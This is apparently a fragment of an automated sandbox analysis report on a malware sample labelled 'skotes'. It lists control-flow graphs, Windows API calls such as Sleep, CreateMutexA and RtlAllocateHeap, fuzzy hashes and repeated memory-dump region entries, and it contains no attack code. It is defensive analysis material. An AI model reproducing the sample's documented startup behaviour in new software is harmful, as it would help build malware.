                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: 87bf7f19ed01d31233dbad31424dd410c64ea2b6f3c983cd57d89bd968f0931f
                                                          • Instruction ID: ef67a929bb6bed55d552c7d36a23915ceaa1ea8466093bd00aa5b3f988981c82
                                                          • Opcode Fuzzy Hash: 87bf7f19ed01d31233dbad31424dd410c64ea2b6f3c983cd57d89bd968f0931f
                                                          • Instruction Fuzzy Hash: CA217F712452809BFB24676E9C9673DB7D5DF82300F2489E6E504D72D2CFB5A9818153

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 292 bea34f-bea35b 293 bea35d-bea36b 292->293 294 bea371-bea39a call bfd663 292->294 293->294 295 bea93a 293->295 300 bea39c-bea3a8 294->300 301 bea3c8-bea916 call bf80c0 294->301 297 bea953-bea994 Sleep CreateMutexA 295->297 298 bea93a call c16c6a 295->298 306 bea996-bea998 297->306 307 bea9a7-bea9a8 297->307 298->297 303 bea3be-bea3c5 call bfd663 300->303 304 bea3aa-bea3b8 300->304 303->301 304->295 304->303 306->307 311 bea99a-bea9a5 306->311 311->307
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: 179da433d8d050e358a9888a534a34754a3a522119b10765dc271b794c76f9a9
                                                          • Instruction ID: 40d0aca07eaa1353ff1f87aa0056ca8540a94763c55a0a01f4742a30ced95f1f
                                                          • Opcode Fuzzy Hash: 179da433d8d050e358a9888a534a34754a3a522119b10765dc271b794c76f9a9
                                                          • Instruction Fuzzy Hash: AC214C317042809BEB189B6DDC8576CB7E6EBC2310F244659E404DB6D6C7B575848653

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 351 c1d82f-c1d83a 352 c1d848-c1d84e 351->352 353 c1d83c-c1d846 351->353 355 c1d850-c1d851 352->355 356 c1d867-c1d878 RtlAllocateHeap 352->356 353->352 354 c1d87c-c1d887 call c175f6 353->354 361 c1d889-c1d88b 354->361 355->356 357 c1d853-c1d85a call c19dc0 356->357 358 c1d87a 356->358 357->354 364 c1d85c-c1d865 call c18e36 357->364 358->361 364->354 364->356
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C1A813,00000001,00000364,00000006,000000FF,?,00C1EE3F,?,00000004,00000000,?,?), ref: 00C1D870
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: cfbd2be9b0227e1a7e8e071451dc6fcd31bbed815a11c8f64d003fb178f8eee3
                                                          • Instruction ID: 0391361d972a1afa1ee54b358b73f123eb39ba906e3e450c1a2c74249ef86213
                                                          • Opcode Fuzzy Hash: cfbd2be9b0227e1a7e8e071451dc6fcd31bbed815a11c8f64d003fb178f8eee3
                                                          • Instruction Fuzzy Hash: 28F0E23260512466FF213A729C01BDB3B59DF83770B288121FC1AA71D1DA30DD81B6E1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                          • String ID: s|-I
                                                          • API String ID: 32384418-705684097
                                                          • Opcode ID: 5da12131bcbbe1435ffa4acc6d700590997d5cd57cfcc967dac3d83f2096290a
                                                          • Instruction ID: beef3fd9b833f2df0854626b2d53be5178c5e95ae162f9740d65d43676d916e3
                                                          • Opcode Fuzzy Hash: 5da12131bcbbe1435ffa4acc6d700590997d5cd57cfcc967dac3d83f2096290a
                                                          • Instruction Fuzzy Hash: 02A10670901249EFDB10DF66C94876ABBF8FF15710F0481A9E915D7242EB35DA08CBD1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                          • String ID: s|-I
                                                          • API String ID: 531285432-705684097
                                                          • Opcode ID: 34dbf5ea86c0f535f0327ea6d2c3b3596c916e88e754a6628b9c5592cacf6817
                                                          • Instruction ID: c8064f495d2dfb4ebe862086979898f466a28cb1d16ca585a62f81bb9fd174b9
                                                          • Opcode Fuzzy Hash: 34dbf5ea86c0f535f0327ea6d2c3b3596c916e88e754a6628b9c5592cacf6817
                                                          • Instruction Fuzzy Hash: DB212F75A0011DAFDF00EFA8DD81EBEBBB9EF08714F500495FA01A7251DB319D499BA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
